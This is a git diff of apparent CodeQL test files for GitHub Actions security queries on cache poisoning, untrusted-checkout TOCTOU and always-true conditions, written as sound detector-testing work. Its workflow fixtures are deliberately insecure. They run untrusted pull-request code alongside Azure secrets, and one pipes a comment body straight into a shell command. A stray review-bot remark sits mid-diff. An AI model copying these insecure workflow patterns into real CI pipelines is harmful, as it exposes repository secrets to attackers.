@@ -1,2 +1,2 @@ -Security/CWE-349/CachePoisoningViaCodeInjection.ql - +query: Security/CWE-349/CachePoisoningViaCodeInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected index 4cc8536b5943..4014714be4b7 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected 
@@ -1,3 +1,10 @@ +#select +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). 
| .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | | .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | 
@@ -43,10 +50,3 @@ edges | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | -#select -| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). 
| .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref index 9d1910990fc0..0002f755786f 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref @@ -1,2 +1,2 @@ -Security/CWE-349/CachePoisoningViaDirectCache.ql - +query: Security/CWE-349/CachePoisoningViaDirectCache.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected index 6b1a3e873134..57a1fd7b8d87 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected 
@@ -1,3 +1,11 @@ +#select +| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). 
| .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | | .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | 
@@ -43,11 +51,3 @@ edges
 | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step |
 | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step |
 | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step |
-#select
-| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
-| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
-| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
-| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target |
-| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target |
-| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target |
-| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target |
diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref
index 89db21d70f59..9855767d1a86 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref
@@ -1,2 +1,2 @@
-Security/CWE-349/CachePoisoningViaPoisonableStep.ql
-
+query: Security/CWE-349/CachePoisoningViaPoisonableStep.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml index a4acd7387660..abea1002fd38 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml @@ -55,9 +55,9 @@ jobs: with: submodules: recursive ref: ${{ fromJson(steps.issue.outputs.result).ref }} - - run: bash comment_example/tests.sh + - run: bash comment_example/tests.sh # $ Source[actions/untrusted-checkout-toctou/critical] - test3: + test3: # $ Alert[actions/untrusted-checkout-toctou/critical] if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} runs-on: ubuntu-latest steps: @@ -65,4 +65,4 @@ jobs: with: submodules: recursive ref: "refs/pull/${{ github.event.number }}/merge" - - run: bash comment_example/tests.sh + - run: bash comment_example/tests.sh # $ Alert[actions/untrusted-checkout-toctou/critical] Source[actions/untrusted-checkout-toctou/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml index a4acd7387660..abea1002fd38 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml 
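Review bot: The `Alert` marker on `test3:` sits on a job key, while the finding it expects is the `- run: bash comment_example/tests.sh` step of the job above: the `.expected` row is `comment.yml:58:9:60:2 | Run Step`, so the marker is attached to the line where that step's location ends, not where it starts. The same shift shows in test5.yml, where the row `test5.yml:156:7:169:4 | Run Step` is annotated on `- name: Deploy scorer`, and in test0.yml, test4.yml and test6.yml. Someone reading a fixture to learn which step performs the untrusted execution will take the annotated line for the flagged one. I would document the convention once, for instance in the test directory's README or a trailing comment such as `# expectation markers sit on the last line of the flagged step's location, i.e. often the first line of the next step or job` (a line added above line 58 would shift the recorded locations).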
@@ -55,9 +55,9 @@ jobs: with: submodules: recursive ref: ${{ fromJson(steps.issue.outputs.result).ref }} - - run: bash comment_example/tests.sh + - run: bash comment_example/tests.sh # $ Source[actions/untrusted-checkout-toctou/critical] - test3: + test3: # $ Alert[actions/untrusted-checkout-toctou/critical] if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} runs-on: ubuntu-latest steps: @@ -65,4 +65,4 @@ jobs: with: submodules: recursive ref: "refs/pull/${{ github.event.number }}/merge" - - run: bash comment_example/tests.sh + - run: bash comment_example/tests.sh # $ Alert[actions/untrusted-checkout-toctou/critical] Source[actions/untrusted-checkout-toctou/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml index 9444ad0b627c..937f223a5a2f 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml @@ -82,8 +82,8 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup + - name: Environment setup # $ Source[actions/untrusted-checkout-toctou/critical] uses: ./.github/actions/setup-env with: - azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} # $ Alert[actions/untrusted-checkout-toctou/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml index e3e557cc5112..5cd25eb52cba 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml 
@@ -90,7 +90,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get environment from comment + - name: Get environment from comment # $ Source[actions/untrusted-checkout-toctou/critical] id: environment shell: bash env: @@ -153,7 +153,7 @@ jobs: with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} - - name: Deploy server + - name: Deploy server # $ Alert[actions/untrusted-checkout-toctou/critical] if: >- ${{ (contains(github.event.comment.body, '/deploy to') || @@ -166,7 +166,7 @@ jobs: COMMENT_BODY: ${{ github.event.comment.body }} run: poetry run python server.py --endpoint_location=remote --autodeploy=True - - name: Deploy scorer + - name: Deploy scorer # $ Alert[actions/untrusted-checkout-toctou/critical] if: >- ${{ contains(github.event.comment.body, '/deploy as async scorer') || @@ -177,7 +177,7 @@ jobs: PR_NUMBER: ${{ github.event.issue.number }} run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True - - name: Set latest commit status as ${{ job.status }} + - name: Set latest commit status as ${{ job.status }} # $ Alert[actions/untrusted-checkout-toctou/critical] uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 if: always() with: diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml index 4a6d1452af24..bf14336adb66 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml @@ -44,7 +44,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Install GH CLI + - name: Install GH CLI # $ Alert[actions/untrusted-checkout-toctou/high] uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 - name: Check comment keywords 
@@ -94,7 +94,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Log into Azure + - name: Log into Azure # $ Alert[actions/untrusted-checkout-toctou/high] uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 with: creds: ${{ secrets.AZURE_CREDENTIALS }} @@ -164,7 +164,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get pipeline info from comment + - name: Get pipeline info from comment # $ Source[actions/untrusted-checkout-toctou/critical] id: pipeline-info run: | model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ @@ -215,13 +215,13 @@ jobs: with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} - - name: Kickoff run + - name: Kickoff run # $ Alert[actions/untrusted-checkout-toctou/critical] if: contains(github.event.comment.body, '/kickoff') env: BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} - - name: Set latest commit status as ${{ job.status }} + - name: Set latest commit status as ${{ job.status }} # $ Alert[actions/untrusted-checkout-toctou/critical] uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 if: always() with: diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index da66ff822a39..cf212950f1e2 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
@@ -1,3 +1,14 @@
+#select
+| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment |
+| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment |
+| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment |
+| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment |
+| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment |
 edges
 | .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step |
 | .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step |
@@ -96,14 +107,3 @@ edges
 | .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:224:7:232:4 | Uses Step |
 | .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step |
 | .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step |
-#select
-| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment |
-| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment |
-| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment |
-| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment |
-| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment |
-| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
-| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
-| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
-| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment |
-| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment |
diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref
index f924f8fe750c..c4a686750f37 100644
--- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref @@ -1 +1,2 @@ -Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +query: Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref index 6284c786b3ae..67d2bf06c396 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref @@ -1 +1,2 @@ -Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +query: Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml index bbbcc5aaa791..e3b1c4047f8a 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml @@ -16,7 +16,7 @@ jobs: ${{ 1 == 2 || 3 == 4 - }} + }} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 2 should not be printed" - name: Test 3 if: ${{ 1 == 2 }} @@ -31,7 +31,7 @@ jobs: }} run: echo "Test 5 should not be printed" - name: Test 6 - if: ${{ 1 == 1 }} ${{ 1 == 2 }} + if: ${{ 1 == 1 }} ${{ 1 == 2 }} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 6 should not be printed" - name: Test 7 run: echo "Test 7 should not be printed" @@ -45,7 +45,7 @@ jobs: if: > ${{ 1 == 2 || - 3 == 4 }} + 3 == 4 }} # $ Alert[actions/if-expression-always-true/high] - name: Test 9 if: '${{ 1 == 2 }}' run: echo "Test 9 should not be printed" 
